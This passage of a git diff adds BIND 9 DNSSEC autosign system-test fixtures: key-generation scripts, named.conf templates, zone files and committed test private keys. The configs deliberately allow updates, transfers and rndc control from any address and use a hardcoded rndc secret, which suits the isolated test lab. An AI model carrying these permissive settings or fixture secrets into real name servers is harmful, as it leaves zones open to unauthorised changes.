ns3/*.nzd ns3/*.nzd-lock ns3/*.nzf +rm -f ns3/*.nzf +rm -f ns3/autonsec3.example.db +rm -f ns3/cdnskey-delete.example.db +rm -f ns3/cds-delete.example.db +rm -f ns3/delzsk.example.db +rm -f ns3/dname-at-apex-nsec3.example.db +rm -f ns3/inacksk2.example.db +rm -f ns3/inacksk3.example.db +rm -f ns3/inaczsk2.example.db +rm -f ns3/inaczsk3.example.db +rm -f ns3/jitter.nsec3.example.db +rm -f ns3/kg.out ns3/s.out ns3/st.out +rm -f ns3/kskonly.example.db +rm -f ns3/named.ns3.prev +rm -f ns3/noksk.example.db +rm -f ns3/nozsk.example.db ns3/inaczsk.example.db +rm -f ns3/nsec-only.example.db +rm -f ns3/nsec3-to-nsec.example.db +rm -f ns3/nsec3.example.db +rm -f ns3/nsec3.nsec3.example.db +rm -f ns3/nsec3.optout.example.db +rm -f ns3/oldsigs.example.db +rm -f ns3/optout.example.db +rm -f ns3/optout.nsec3.example.db +rm -f ns3/optout.optout.example.db +rm -f ns3/prepub.example.db +rm -f ns3/prepub.example.db.in +rm -f ns3/reconf.example.db +rm -f ns3/rsasha256.example.db ns3/rsasha512.example.db +rm -f ns3/secure-to-insecure.example.db +rm -f ns3/secure-to-insecure2.example.db +rm -f ns3/secure.example.db +rm -f ns3/secure.nsec3.example.db +rm -f ns3/secure.optout.example.db +rm -f ns3/settime.out.* +rm -f ns3/sync.example.db +rm -f ns3/ttl*.db +rm -f nsupdate.out +rm -f settime.out.* +rm -f signing.out.* +rm -f sync.key diff --git a/bin/tests/system/autosign/ns1/keygen.sh b/bin/tests/system/autosign/ns1/keygen.sh new file mode 100644 index 0000000..44401cb --- /dev/null +++ b/bin/tests/system/autosign/ns1/keygen.sh @@ -0,0 +1,54 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +zonefile=root.db +infile=root.db.in + +(cd ../ns2 && $SHELL keygen.sh ) + +cat $infile ../ns2/dsset-example$TP ../ns2/dsset-bar$TP > $zonefile + +zskact=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q $zone) +zskvanish=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q $zone) +zskdel=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -D now $zone) +zskinact=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -I now $zone) +zskunpub=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -G $zone) +zsksby=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -A none $zone) +zskactnowpub1d=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -A now -P +1d $zone) +zsknopriv=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q $zone) +rm $zsknopriv.private + +ksksby=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -P now -A now+15s -fk $zone) +kskrev=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -R now+15s -fk $zone) + +keyfile_to_static_ds $ksksby > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns4/trusted.conf + +keyfile_to_static_ds $kskrev > trusted.conf +cp trusted.conf ../ns5/trusted.conf + +echo $zskact > ../active.key +echo $zskvanish > ../vanishing.key +echo $zskdel > ../del.key +echo $zskinact > ../inact.key +echo $zskunpub > ../unpub.key +echo $zsknopriv > ../nopriv.key +echo $zsksby > ../standby.key +echo $zskactnowpub1d > ../activate-now-publish-1day.key +$REVOKE -R $kskrev > ../rev.key diff --git a/bin/tests/system/autosign/ns1/named.conf.in b/bin/tests/system/autosign/ns1/named.conf.in new file mode 100644 index 0000000..d0cfa03 --- /dev/null +++ b/bin/tests/system/autosign/ns1/named.conf.in @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; + allow-transfer { any; }; + allow-query { any; }; + allow-update { any; }; + auto-dnssec maintain; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/autosign/ns1/root.db.in b/bin/tests/system/autosign/ns1/root.db.in new file mode 100644 index 0000000..6715a02 --- /dev/null +++ b/bin/tests/system/autosign/ns1/root.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +. IN SOA a.root.servers.nil. each.isc.org. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +. TXT "root zone" +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +bar. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+59973.key b/bin/tests/system/autosign/ns2/Xbar.+013+59973.key new file mode 100644 index 0000000..1f4d1f4 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+59973.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 59973, for bar. +; Created: 20220623022335 (Thu Jun 23 12:23:35 2022) +; Publish: 20220623022335 (Thu Jun 23 12:23:35 2022) +; Activate: 20220623022335 (Thu Jun 23 12:23:35 2022) +bar. IN DNSKEY 257 3 13 QT6CpMaV4BT072+NaKLY5H01Mj2r1MOgsxgoiTAq1Fbf6rrkEWpnbktu Dh9Ol9kuzcUrefxDuxNwsXJu3iDPxw== diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+59973.private b/bin/tests/system/autosign/ns2/Xbar.+013+59973.private new file mode 100644 index 0000000..708d242 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+59973.private @@ -0,0 +1,6 @@ +Private-key-format: v1.3 +Algorithm: 13 (ECDSAP256SHA256) +PrivateKey: joFZ8vCdyqkgMb6rZ0zanrdrzOSCg1GyEJV6tp5F+Bw= +Created: 20220623022335 +Publish: 20220623022335 +Activate: 20220623022335 diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+60101.key b/bin/tests/system/autosign/ns2/Xbar.+013+60101.key new file mode 100644 index 0000000..0c47840 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+60101.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 60101, for bar. +; Created: 20220623022331 (Thu Jun 23 12:23:31 2022) +; Publish: 20220623022331 (Thu Jun 23 12:23:31 2022) +; Activate: 20220623022331 (Thu Jun 23 12:23:31 2022) +bar. IN DNSKEY 257 3 13 dLGGOAE5uJd53Gci9MdymaRTMwsXVn13j05IfGJoVt9ucpeXpoIKVViX JNVE/uO4eJvkHycdEAvdVUWcslEmMQ== diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+60101.private b/bin/tests/system/autosign/ns2/Xbar.+013+60101.private new file mode 100644 index 0000000..6ca8370 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+60101.private @@ -0,0 +1,6 @@ +Private-key-format: v1.3 +Algorithm: 13 (ECDSAP256SHA256) +PrivateKey: pTTXxZUTzeVBXHMUJxTMxjh9yU4oxDtEhEvpkj+olf0= +Created: 20220623022331 +Publish: 20220623022331 +Activate: 20220623022331 diff --git a/bin/tests/system/autosign/ns2/bar.db.in b/bin/tests/system/autosign/ns2/bar.db.in new file mode 100644 index 0000000..8a9fa98 --- /dev/null +++ b/bin/tests/system/autosign/ns2/bar.db.in @@ -0,0 +1,80 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns.secure +ns.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +z A 10.0.0.26 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 diff --git a/bin/tests/system/autosign/ns2/child.nsec3.example.db b/bin/tests/system/autosign/ns2/child.nsec3.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/autosign/ns2/child.nsec3.example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/autosign/ns2/child.optout.example.db b/bin/tests/system/autosign/ns2/child.optout.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/autosign/ns2/child.optout.example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/autosign/ns2/dst.example.db.in b/bin/tests/system/autosign/ns2/dst.example.db.in new file mode 100644 index 0000000..0039484 --- /dev/null +++ b/bin/tests/system/autosign/ns2/dst.example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2.example. +a A 10.0.0.1 diff --git a/bin/tests/system/autosign/ns2/example.db.in b/bin/tests/system/autosign/ns2/example.db.in new file mode 100644 index 0000000..a970074 --- /dev/null +++ b/bin/tests/system/autosign/ns2/example.db.in @@ -0,0 +1,88 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns.secure +ns.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +z A 10.0.0.26 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +nsec3-to-nsec NS ns.nsec3-to-nsec +ns.nsec3-to-nsec A 10.53.0.3 + +oldsigs NS ns.oldsigs +ns.oldsigs A 10.53.0.3 + +dname-at-apex-nsec3 NS ns3 diff --git a/bin/tests/system/autosign/ns2/insecure.secure.example.db b/bin/tests/system/autosign/ns2/insecure.secure.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/autosign/ns2/insecure.secure.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/autosign/ns2/keygen.sh b/bin/tests/system/autosign/ns2/keygen.sh new file mode 100644 index 0000000..087d397 --- /dev/null +++ b/bin/tests/system/autosign/ns2/keygen.sh @@ -0,0 +1,66 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# Have the child generate subdomain keys and pass DS sets to us. +( cd ../ns3 && $SHELL keygen.sh ) + +for subdomain in secure nsec3 autonsec3 optout rsasha256 rsasha512 \ + nsec3-to-nsec oldsigs sync dname-at-apex-nsec3 cds-delete \ + cdnskey-delete +do + cp ../ns3/dsset-$subdomain.example$TP . +done + +# Create keys and pass the DS to the parent. +zone=example +zonefile="${zone}.db" +infile="${zonefile}.in" +cat $infile dsset-*.example$TP > $zonefile + +kskname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q -fk $zone) +$KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q $zone > /dev/null +$DSFROMKEY $kskname.key > dsset-${zone}$TP + +# Create keys for a private secure zone. +zone=private.secure.example +zonefile="${zone}.db" +infile="${zonefile}.in" +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q -fk $zone) +$KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q $zone > /dev/null +keyfile_to_static_ds $ksk > private.conf +cp private.conf ../ns4/private.conf +$SIGNER -S -3 beef -A -o $zone -f $zonefile $infile > /dev/null + +# Extract saved keys for the revoke-to-duplicate-key test +zone=bar +zonefile="${zone}.db" +infile="${zonefile}.in" +cat $infile > $zonefile +for i in Xbar.+013+59973.key Xbar.+013+59973.private \ + Xbar.+013+60101.key Xbar.+013+60101.private +do + cp $i $(echo $i | sed s/X/K/) +done +$KEYGEN -a ECDSAP256SHA256 -q $zone > /dev/null +$DSFROMKEY Kbar.+013+60101.key > dsset-bar$TP + +# a zone with empty non-terminals. +zone=optout-with-ent +zonefile=optout-with-ent.db +infile=optout-with-ent.db.in +cat $infile > $zonefile +kskname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q -fk $zone) +$KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q $zone > /dev/null diff --git a/bin/tests/system/autosign/ns2/named.conf.in b/bin/tests/system/autosign/ns2/named.conf.in new file mode 100644 index 0000000..d70306a --- /dev/null +++ b/bin/tests/system/autosign/ns2/named.conf.in @@ -0,0 +1,108 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; + dnssec-loadkeys-interval 30; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; + allow-query { any; }; + allow-transfer { any; }; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "bar" { + type primary; + file "bar.db"; + allow-query { any; }; + allow-transfer { any; }; + allow-update { any; }; + auto-dnssec maintain; + dnssec-dnskey-kskonly yes; +}; + +zone "private.secure.example" { + type primary; + file "private.secure.example.db"; + allow-query { any; }; + allow-transfer { any; }; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "insecure.secure.example" { + type primary; + file "insecure.secure.example.db"; + allow-query { any; }; + allow-transfer { any; }; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "child.nsec3.example" { + type primary; + file "child.nsec3.example.db"; + allow-query { any; }; + allow-transfer { any; }; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "child.optout.example" { + type primary; + file "child.optout.example.db"; + allow-query { any; }; + allow-transfer { any; }; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "optout-with-ent" { + type primary; + file "optout-with-ent.db"; + allow-query { any; }; + allow-transfer { any; }; + allow-update { any; }; + auto-dnssec maintain; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/autosign/ns2/optout-with-ent.db.in b/bin/tests/system/autosign/ns2/optout-with-ent.db.in new file mode 100644 index 0000000..5a3e207 --- /dev/null +++ b/bin/tests/system/autosign/ns2/optout-with-ent.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns2.example. . ( + 2010042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2.example. +sub1.ent NS . +sub2.ent NS . diff --git a/bin/tests/system/autosign/ns2/private.secure.example.db.in b/bin/tests/system/autosign/ns2/private.secure.example.db.in new file mode 100644 index 0000000..29fcddf --- /dev/null +++ b/bin/tests/system/autosign/ns2/private.secure.example.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +private2secure-nxdomain CNAME r.example. diff --git a/bin/tests/system/autosign/ns3/autonsec3.example.db.in b/bin/tests/system/autosign/ns3/autonsec3.example.db.in new file mode 100644 index 0000000..17964e8 --- /dev/null +++ b/bin/tests/system/autosign/ns3/autonsec3.example.db.in @@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +child NS ns2.example. +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17 diff --git a/bin/tests/system/autosign/ns3/cdnskey-delete.example.db.in b/bin/tests/system/autosign/ns3/cdnskey-delete.example.db.in new file mode 100644 index 0000000..3083a79 --- /dev/null +++ b/bin/tests/system/autosign/ns3/cdnskey-delete.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, You can obtain one at http://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/cds-delete.example.db.in b/bin/tests/system/autosign/ns3/cds-delete.example.db.in new file mode 100644 index 0000000..3083a79 --- /dev/null +++ b/bin/tests/system/autosign/ns3/cds-delete.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, You can obtain one at http://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/delay.example.db b/bin/tests/system/autosign/ns3/delay.example.db new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/delay.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/delzsk.example.db.in b/bin/tests/system/autosign/ns3/delzsk.example.db.in new file mode 100644 index 0000000..14fef54 --- /dev/null +++ b/bin/tests/system/autosign/ns3/delzsk.example.db.in @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000010101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +sub NS ns.sub + DS 12345 8 1 0000000000000000000000000000000000000000 +ns.sub A 10.53.0.3 diff --git a/bin/tests/system/autosign/ns3/dname-at-apex-nsec3.example.db.in b/bin/tests/system/autosign/ns3/dname-at-apex-nsec3.example.db.in new file mode 100644 index 0000000..080d111 --- /dev/null +++ b/bin/tests/system/autosign/ns3/dname-at-apex-nsec3.example.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns3.example. . 1 1200 1200 1814400 3600 +@ NS ns3.example. +@ DNAME example. +@ NSEC3PARAM 1 0 0 - diff --git a/bin/tests/system/autosign/ns3/inacksk2.example.db.in b/bin/tests/system/autosign/ns3/inacksk2.example.db.in new file mode 100644 index 0000000..1376922 --- /dev/null +++ b/bin/tests/system/autosign/ns3/inacksk2.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the 